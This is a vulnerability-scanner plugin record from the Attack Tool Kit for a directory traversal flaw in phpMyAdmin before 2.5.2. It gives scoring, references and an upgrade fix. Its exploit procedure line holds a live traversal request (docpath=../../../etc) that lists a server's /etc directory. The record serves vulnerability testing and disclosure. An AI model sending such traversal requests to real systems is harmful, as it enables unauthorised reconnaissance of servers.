phpMyAdmin prior 2.5.2 db_details_importdocsql.php directory traversal 1.0
 
Plugin ID342
Plugin namephpMyAdmin prior 2.5.2 db_details_importdocsql.php directory traversal
Plugin filenamephpMyAdmin prior 2.5.2 db_details_importdocsql.php directory traversal.plugin
Plugin filesize3192 bytes
Plugin familyCGI
Plugin created nameMarc Ruef
Plugin created emailmarc.ruef at computec.ch
Plugin created webhttp://www.computec.ch
Plugin created companycomputec.ch
Plugin created date2005/01/09
Plugin version1.0
Plugin protocoltcp
Plugin port80
Plugin procedure detectionopen|send GET /main.php HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *Welcome *to *phpMyAdmin*2.[0-4].*</h1>* OR HTTP/#.# 200 *Welcome *to *phpMyAdmin*2.5.[0-2]*</h1>*
Plugin procedure exploitopen|send GET /db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../../../../etc HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *Ignoring file passwd*
Plugin detection accuracy80
Plugin exploit accuracy97
Plugin commentThe NASL script is Copyright (C) 2003 Tenable Network Security
Bug published nameLorenzo Manuel Hernandez Garcia-Hierro
Bug published emailsecurity at lorenzohgh.com
Bug affectedphpMyAdmin prior 2.5.2
Bug not affectedphpMyAdmin newer than 2.5.2
Bug vulnerability classDirectory Traversal
Bug descriptionThe remote host is running a version of phpMyAdmin which is vulnerable to several flaws: It may be tricked into disclosing the physical path of the remote PHP installation, it is vulnerable to Cross-Site scripting, which may allow an attacker to steal the cookies of your users and it is vulnerable to a flaw which may allow an attacker to list the content of arbitrary directories on the remote server. An attacker may use these flaws to gain more knowledge about the remote host and therefore set up more complex attacks against it.
Bug solutionUpgrade to phpMyAdmin 2.5.2 or newer.
Bug fixing timeApprox. 30 minutes
Bug exploit availabilityYes
Bug exploit urlhttp://www.securityfocus.com/bid/7962/exploit/
Bug remoteYes
Bug localYes
Bug severityHigh
Bug popularity7
Bug simplicity8
Bug impact8
Bug risk8
Bug Nessus riskMedium
Bug check toolsNessus can check this flaw with the plugin 11761 (phpMyAdmin multiple flaws).
Source SecurityFocus BID7962
Source Nessus ID11761
Source LiteratureHacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427
Source Misc.http://www.computec.ch

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.